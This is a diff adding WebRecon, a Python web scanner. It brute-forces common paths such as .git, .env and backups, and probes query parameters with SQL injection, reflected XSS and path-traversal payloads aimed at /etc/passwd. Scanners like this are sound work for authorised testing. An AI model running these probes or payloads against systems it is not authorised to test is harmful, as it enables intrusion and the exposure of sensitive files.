@@ -0,0 +1,185 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
WebRecon - A tool for web reconnaissance and basic vulnerability scanning.
|
||||
"""
|
||||
import requests
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
from urllib.parse import urljoin, urlencode # Added urlencode
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class WebRecon:
    """
    A class for performing basic web reconnaissance and simple vulnerability checks.

    The scan runs in three stages: a base connectivity/header check, common-path
    discovery from a built-in wordlist, and payload probes on common query
    parameters for SQL injection, reflected XSS and LFI.
    """
    def __init__(self, config: Dict):
        """
        Initializes the WebRecon tool.

        Args:
            config (Dict): The configuration dictionary for the framework.
        """
        self.config = config
        # Expanded wordlist for discovering common paths
        self.wordlist = [
            "admin", "login", "dashboard", "api", "robots.txt", "sitemap.xml",
            "test", "dev", "backup", "v1", "v2", "v3", ".git", ".env", "config.php",
            "phpinfo.php", "index.php", "main.php", "home.php", "portal.php",
            "upload", "files", "images", "assets", "downloads", "includes",
            "src", "backup.zip", "data.sql", "admin.bak", "panel"
        ]
        # Browser-like User-Agent so trivial bot filters don't skew results
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
        }
        # Query parameters commonly consumed (and reflected) by web apps
        self.test_parameters = ["id", "page", "cat", "item", "view", "name", "query", "search"]

    def analyze(self, target: str) -> Dict:
        """
        Analyzes a web target to find common directories, files, and basic vulnerabilities.

        Args:
            target (str): The base URL to analyze. It should include the scheme
                (http/https); a missing scheme defaults to http.

        Returns:
            Dict: Findings with keys "target", "status_code", "headers",
                "discovered_paths" and "vulnerabilities", or
                ``{"error": ...}`` when the target is unreachable.
        """
        logger.info(f"Starting web reconnaissance and basic vulnerability scan on {target}")
        findings = {
            "target": target,
            "status_code": None,
            "headers": {},
            "discovered_paths": [],
            "vulnerabilities": []
        }

        if not target.startswith(('http://', 'https://')):
            target = f"http://{target}"
            logger.info(f"No scheme provided. Defaulting to http: {target}")

        # 1. Check base URL connectivity and headers
        try:
            response = requests.head(target, headers=self.headers, timeout=5, allow_redirects=True)
            findings["status_code"] = response.status_code
            findings["headers"] = dict(response.headers)
            logger.info(f"Target {target} is online. Status: {response.status_code}")
        except requests.RequestException as e:
            logger.error(f"Failed to connect to {target}: {e}")
            return {"error": f"Failed to connect to target: {e}"}

        # 2. Discover common paths (2xx/3xx responses count as "found")
        for path in self.wordlist:
            url_to_check = urljoin(target, path)
            try:
                res = requests.get(url_to_check, headers=self.headers, timeout=3, allow_redirects=False)
                if 200 <= res.status_code < 400:
                    logger.info(f"Found path: {url_to_check} (Status: {res.status_code})")
                    findings["discovered_paths"].append({
                        "path": url_to_check,
                        "status_code": res.status_code
                    })
            except requests.RequestException:
                # Ignore connection errors for sub-paths
                continue

        # 3. Perform basic vulnerability checks
        logger.info(f"Performing basic vulnerability checks on {target}")
        findings["vulnerabilities"].extend(self._check_sqli(target))
        findings["vulnerabilities"].extend(self._check_xss(target))
        findings["vulnerabilities"].extend(self._check_lfi(target))

        logger.info(f"Web reconnaissance on {target} finished. Found {len(findings['discovered_paths'])} paths and {len(findings['vulnerabilities'])} vulnerabilities.")
        return findings

    def _scan_parameters(self, target: str, payloads: List[str], is_hit,
                         vuln_type: str, severity: str, desc_name: str,
                         log_label: str) -> List[Dict]:
        """
        Shared probe loop used by all vulnerability checkers.

        Sends each payload on each test parameter and records a finding
        whenever ``is_hit(response, payload)`` returns True. Stops after the
        first finding per parameter (one data point is enough evidence for a
        "potential" flag).

        Args:
            target: Base URL to probe.
            payloads: Raw payload strings to inject.
            is_hit: Callable ``(response, payload) -> bool`` deciding whether
                the response indicates a vulnerability.
            vuln_type: Value for the finding's "type" field.
            severity: Value for the finding's "severity" field.
            desc_name: Short name used in the human-readable description.
            log_label: Short name used in the warning log line.

        Returns:
            List[Dict]: One finding dict per detected parameter.
        """
        vulnerabilities: List[Dict] = []
        for param in self.test_parameters:
            for payload in payloads:
                # BUGFIX: the old code built the query with
                # urlencode({'': payload}), producing "?param==<encoded>"
                # (a spurious '='). urlencode({param: payload}) yields a
                # correctly encoded "param=<encoded>" pair.
                test_url = f"{target}?{urlencode({param: payload})}"
                try:
                    response = requests.get(test_url, headers=self.headers, timeout=5)
                except requests.RequestException:
                    continue
                if is_hit(response, payload):
                    vulnerabilities.append({
                        "type": vuln_type,
                        "severity": severity,
                        "url": test_url,
                        "parameter": param,
                        "payload": payload,
                        "response_snippet": response.text[:200],
                        "description": f"Potential {desc_name} via parameter '{param}' with payload '{payload}'"
                    })
                    logger.warning(f"Potential {log_label} found: {test_url}")
                    # Stop after first finding for this param/type
                    break
        return vulnerabilities

    def _check_sqli(self, target: str) -> List[Dict]:
        """Checks for basic error-based SQL Injection vulnerabilities."""
        sqli_payloads = ["'", " or 1=1-- -", " or 1=1#", "\" or 1=1-- -"]
        sqli_error_patterns = ["sql syntax", "mysql_fetch_array()", "error in your sql syntax", "warning: mysql", "unclosed quotation mark"]

        def has_sql_error(response, _payload):
            # Any well-known DB error string in the body suggests injection.
            body = response.text.lower()
            return any(pattern in body for pattern in sqli_error_patterns)

        return self._scan_parameters(target, sqli_payloads, has_sql_error,
                                     "SQL Injection", "High",
                                     "SQL Injection", "SQLi")

    def _check_xss(self, target: str) -> List[Dict]:
        """Checks for basic reflected Cross-Site Scripting (XSS) vulnerabilities."""
        xss_payloads = [
            "<script>alert(1)</script>",
            "<img src=x onerror=alert(1)>",
            "<svg onload=alert(1)>"
        ]

        def is_reflected(response, payload):
            # Payload echoed back unencoded => likely reflected XSS.
            # (The old code also tested a no-op .replace() variant of the
            # same payload, which was redundant and has been removed.)
            return payload in response.text

        return self._scan_parameters(target, xss_payloads, is_reflected,
                                     "Cross-Site Scripting (XSS)", "Medium",
                                     "XSS", "XSS")

    def _check_lfi(self, target: str) -> List[Dict]:
        """Checks for basic Local File Inclusion (LFI) vulnerabilities."""
        lfi_payloads = [
            "../../../../etc/passwd",
            "....//....//....//etc/passwd",
            # Pre-encoded variant: urlencode() encodes it again, which
            # exercises servers that URL-decode twice (double-decode bypass).
            "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
        ]
        lfi_patterns = ["root:x:", "daemon:x:", "bin:x:"]  # Common patterns in /etc/passwd

        def leaks_passwd(response, _payload):
            return any(pattern in response.text for pattern in lfi_patterns)

        return self._scan_parameters(target, lfi_payloads, leaks_passwd,
                                     "Local File Inclusion (LFI)", "High",
                                     "LFI", "LFI")
|
||||
Reference in New Issue
Block a user